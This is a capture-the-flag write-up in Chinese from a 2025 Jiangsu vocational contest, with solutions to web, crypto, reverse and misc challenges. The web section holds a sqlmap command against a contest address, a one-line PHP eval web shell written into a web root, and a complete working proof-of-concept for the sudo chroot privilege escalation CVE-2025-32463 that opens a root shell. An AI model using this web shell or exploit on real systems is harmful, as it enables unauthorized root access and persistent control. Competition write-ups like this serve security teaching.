江苏省2025年领航杯高职组初赛wp

WEB

sqllogic

sqlmap一把梭

sqlmap -u "http://123.56.252.211:10664/search/results?query=1"  --columns --batch

2345

#!/bin/bash
echo '<?php @eval($_POST[1]);?>' > /var/www/html/1.php

EXP

#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
#                  @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

if [ $# -eq 0 ]; then
    # If no command is provided, default to an interactive root shell.
    CMD="/bin/bash"
else
    # Otherwise, use the provided arguments as the command to execute.
    CMD="$@"
fi

# Escape the command to safely include it in a C string literal.
# This handles backslashes and double quotes.
CMD_C_ESCAPED=$(printf '%s' "$CMD" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g')

cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/sh", "sh", "-c", "${CMD_C_ESCAPED}", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}

CnHongKe{d615970bc4725ca2881af2c3feb0478a}

crypto

RSA

import math
from Crypto.Util.number import long_to_bytes

# 公钥1
n1 = 153769429480303617525099446277946814072623699231110076379273887722757242160765481869559851273788780678450984350909422818822414195985904573538648872713001201186504130900961170308735898186613895138737221441119689327098326438415593690968056711455002853456141239017564889447759315623956965233123367775181646463569
e = 65537

# 公钥2
n2 = 104741687430424523714786838478654234509265282246882484069496166175381236589633075928091648124588105538388830214365853463306941016687480102941822292757450627262029551405196554479715290287606263306870475686502875025646881346075090866048971120570514658724118468822867615873644463611997913110796731320134873655071

# 公钥3
n3 = 127072523229705801684095912018779375714501598330019912184765605931059131688615461978170306674551422134507076144032643128022879195693745968822183650241544472860326887122832604708994522012049084908928620657112827244844150157797045263197408968602048073217656506951825187944811122881707826260751105841295980719593

# 密文
c = 125315412895807928335784519235211559769835144982922061354440492259897286082293685249810142346705833079386440140091617837339173206443361677162294508248433428570994672827456799069304880986139464481853116113853220664980118573544406369602232717389746738053340393648121384563287904457831635232936065570243703247333

print("检查是否存在公因子...")

# 检查n1和n2的最大公约数
gcd12 = math.gcd(n1, n2)
print(f"gcd(n1, n2) = {gcd12}")

# 检查n1和n3的最大公约数
gcd13 = math.gcd(n1, n3)
print(f"gcd(n1, n3) = {gcd13}")

# 检查n2和n3的最大公约数
gcd23 = math.gcd(n2, n3)
print(f"gcd(n2, n3) = {gcd23}")

# 如果找到公因子,进行分解
if gcd12 > 1:
    print(f"\n找到n1和n2的公因子: {gcd12}")
    p = gcd12
    q1 = n1 // p
    q2 = n2 // p
    print(f"n1 = {p} * {q1}")
    print(f"n2 = {p} * {q2}")

    # 尝试用n1解密
    phi1 = (p - 1) * (q1 - 1)
    d1 = pow(e, -1, phi1)
    m = pow(c, d1, n1)
    flag = long_to_bytes(m)
    print(f"\n使用n1解密: {flag}")

if gcd13 > 1:
    print(f"\n找到n1和n3的公因子: {gcd13}")
    p = gcd13
    q1 = n1 // p
    q3 = n3 // p
    print(f"n1 = {p} * {q1}")
    print(f"n3 = {p} * {q3}")

    # 尝试用n1解密
    phi1 = (p - 1) * (q1 - 1)
    d1 = pow(e, -1, phi1)
    m = pow(c, d1, n1)
    flag = long_to_bytes(m)
    print(f"\n使用n1解密: {flag}")

if gcd23 > 1:
    print(f"\n找到n2和n3的公因子: {gcd23}")
    p = gcd23
    q2 = n2 // p
    q3 = n3 // p
    print(f"n2 = {p} * {q2}")
    print(f"n3 = {p} * {q3}")

    # 尝试用n2解密
    phi2 = (p - 1) * (q2 - 1)
    d2 = pow(e, -1, phi2)
    m = pow(c, d2, n2)
    flag = long_to_bytes(m)
    print(f"\n使用n2解密: {flag}")

CnHongKe{RSA_Factor_collision}

简单的加密

from Crypto.Util.number import isPrime, long_to_bytes

# Given values
xp = 128828824995833818676165843190145859846666191445111620864627041498262245661016272202610927130234264180024813400101811794568199789497304640888935610074527111735848036421350574354570382572071378693075501517651681167292494054044976417262720643752582801173329160691730958462999401681828410402624171054528487701250
xq = 93501864073083147736690555206986500352821561022722329409454421331522568252562336489380752764482378243293382437917734686276648657072965746683388224901642327741574194758168471142399011800111424540627796995389245806705358641695171454225060506776033714187806384242662410691416714061445225830804351743270693121372
xr = 105144997607517188001928065861721085151458500237362541144517526507829179446054616971830089339946039703176024806995930348425831607517690274084049167991564629577993384711086337120614791461782308672504887558723523293013197628325711741922614481250160020165126154205820339228701043543193135643189871148550415187754
xs = 94042557806455290017533368381016830673179627779094170764530475587270704798141833062898858761785570382721745371796537038402431708414498336803427155046473079552324742754878551180385512585438429908432609863042492144422038859638752336244969821224284661504394361784560575917229767348151089936323070236673875593712
xt = 115594002625792151804923109920889964947182530612219522161996511821327755748271726529203452220377801144567805098461740554220527265119790574899164813600030062051737769028153904929475006131181414206071792099760783853052588906957339435715505148998168863245482181389617108685315173753203529355444248415589964563266
e = 65537
N = 13768342636197422304108795246275445967258641652316544453296082236160656248707267721982004373176441942766885427374230049495849901175065942806910339849529322895290083359465104367183088306236191085678167669511362291306468633216535747606889749365259254894702826523442727185050983898733297718141433625792021860096524462678559682734341585154525575647451003761903461413612824889932194540610920552883385126732378435297866284444297906528374412952296800239150586362936056193994908627667719326616138012726943831001847015267804010154104110559100836442001601924797615706682731073713164007060867783148342583181788458193661450452931842513273461021062581477545558571339021209337066016371165905298504298716810524028910898158345277213271752745059877760310870997947311552172141528759161534652496502254755758081938503065288753667472451654272929508728816800566840911928192632562488840795792835400802239092167722551047109923659984356369241614138483265802787439007856122854957666900281868710137011480905791834181203739248946762340824884326967370941119007669361328177488819208137083244171589394888655376850549724240949245226710926599304882791816475420018375478005474378090953210718637003297616537680898021315617608420694645032162429264914513746585824730288392980964264908404687944973472494605215440614705549788380303412439753538674566658859770480726822013741901657165959413925010146614104197911851836517581884355304343194397781221442417117454953952460810354720454937221995544494297618185953174037057112206638590168886580331712922507978337805445955280498907868853003
c = 3439394905782166441237506498757611634998714141967377265411887755183464830334310354099515705754305002453845144284962714493539352810656133902003574128040654732436372908629497886338030606669073185543483523322596108069277796053671242765145978964276489518561416450500971726036585469228102661139692387134453425034514593366519122828410223317311340019214789974257435550120228004472434150629204069661830887363254828526876378522199868362337226780796846608372402557761920573702765258750443160846557153090059064440434346724426460715389019886439838122991032863863340406305841768977271080103507522772324112521643561293330388467509344769916630100806468976640618082578062650775925726334041667328845728195479322234102185934327287314162854772787028760132802923512396238244054062505138988980024436004412713692853733234338730738962165223008806908494845064188562433621027494153054235518266396428664964688598368429580020076077007462387248780075769829446962399209903659674553446709085845766757501999096681846762793969620923766819178695482626653824918978362878571925866996523551223563857125205635241897776460707451261913577017129666152670711880793310692446330139817413931583810554880608441575471540050582658898956625685227344260622059696808482979718413943588193029974948213358126236143000182326987392324674999364168681277849168288214531908472309090186259078173635685596280815852978436316050958960030797731778562439965277821667360684967607722094740294605279702828546177255869762606665589928863794661494707994930291929877434775364757747351457394364263523273286543463

# Calculate A, B, C, D
A = xp ^ xq
B = xp ^ xr
C = xp ^ xs
D = xp ^ xt

# Initialize candidates for p
candidates = [1]  # LSB of p is 1

# Iterate from bit 1 to bit 1023
max_bits = 1024

for i in range(1, max_bits):
    new_candidates = []
    mask = (1 << (i+1)) - 1
    n_low = N & mask
    for p_val in candidates:
        for bit in [0, 1]:
            p_new = p_val | (bit << i)
            # Calculate the low i+1 bits of q, r, s, t
            q_new = (p_new ^ A) & mask
            r_new = (p_new ^ B) & mask
            s_new = (p_new ^ C) & mask
            t_new = (p_new ^ D) & mask
            # Compute the product modulo 2^(i+1)
            product = (p_new * q_new * r_new * s_new * t_new) & mask
            if product == n_low:
                new_candidates.append(p_new)
    candidates = new_candidates
    if i % 50 == 0:
        print(f"Progress: bit {i}, candidates: {len(candidates)}")
    if len(candidates) == 0:
        print("No candidates at bit", i)
        break

print(f"After {max_bits} bits, number of candidates: {len(candidates)}")

# Check the candidates
for p in candidates:
    q = p ^ A
    r = p ^ B
    s = p ^ C
    t = p ^ D
    if p * q * r * s * t == N:
        print("Product matches N!")
        if isPrime(p) and isPrime(q) and isPrime(r) and isPrime(s) and isPrime(t):
            print("All primes verified!")
            F = p ^ xp
            flag = long_to_bytes(F)
            print("Flag:", flag.decode())
            break
else:
    print("No valid candidate found.")

CnHongKe{e34a953cceb1f52c34865cfc98b6ced1}

REVERSE

re4

key = [0x66, 0x6C, 0x61, 0x67]  # "flag"
cipher = [
    0x25, 0x02, 0x29, 0x08, 0x08, 0x0B, 0x2A, 0x02,
    0x1D, 0x5E, 0x02, 0x01, 0x53, 0x0E, 0x58, 0x05,
    0x5F, 0x59, 0x50, 0x50, 0x53, 0x54, 0x55, 0x55,
    0x02, 0x58, 0x56, 0x52, 0x57, 0x5C, 0x57, 0x53,
    0x56, 0x55, 0x02, 0x05, 0x51, 0x0D, 0x54, 0x02,
    0x56, 0x11, 0x61
]

flag = ""
for i in range(len(cipher)):
    decrypted = cipher[i] ^ key[i % 4]
    flag += chr(decrypted)

print(flag)

CnHongKe{2cf5b9b95175842d475106409cb7a5e0}

MISC

mv切片

CnHongKe{N3v3r_G0nna_G1Ve_Y0u_Up}

ftpconfix

在数据包56中发现Base58编码的数据:

9XUnxxRh9REHLRUSizjk3HJ1cfX7kgCtXxMyA9Sv7M8Z66ntasgqAhau88UbGGhwZA

解码（十六进制）:

e869d6e17648b0fcac51ff60c0604f382bbf44daad80c5fc970c5a51d373a67a71218f9b7f73536f210b974af8f11071

在压缩包中发现如下提示：

=== CONFIDENTIAL FINANCIAL REPORT ===
Quarter: Q2 2024
Revenue: $12,450,000
Expenses: $8,210,000
Net Profit: $4,240,000

Key Metrics:
- Customer Growth: +18%
- Market Share: 22.4%

Note: All sensitive data is encrypted. Flag: CnHongKe{THIS_IS_A_DECOY}
Hint: Why not Base64? Try Base58 for better stealth.

Key hint: SHA256 fragment ; IV hint: time struct (!HBBBBBB,year,month,day,hour,minute,second,0) + zero padding

提取关键信息

- 密钥来源: ftp_key (需要SHA256哈希处理)

- IV构造方式: 时间结构 (!HBBBBBB,year,month,day,hour,minute,second,0) + 零填充

- 时间: 2024年3月15日 09:30:00

- 加密算法: AES (根据密钥长度和IV长度判断)

- 加密模式: CBC (根据需要IV判断)

构造密钥和IV

构造IV

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import hashlib
import struct

# 密文
ciphertext = bytes.fromhex("e869d6e17648b0fcac51ff60c0604f382bbf44daad80c5fc970c5a51d373a67a71218f9b7f73536f210b974af8f11071")

# 密钥: SHA256("ftp_key")的前16字节
key = hashlib.sha256(b"ftp_key").digest()[:16]

# IV: 从时间戳2024-03-15 09:30:12构造
iv = struct.pack('!HBBBBBB', 2024, 3, 15, 9, 30, 12, 0) + b'\x00' * 9

# AES-128-CBC解密
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = unpad(cipher.decrypt(ciphertext), 16)

# 结果
print(plaintext.decode('utf-8'))

CnHongKe{FTP_Exf1l_v1a_Mult1_Ch4nn3l}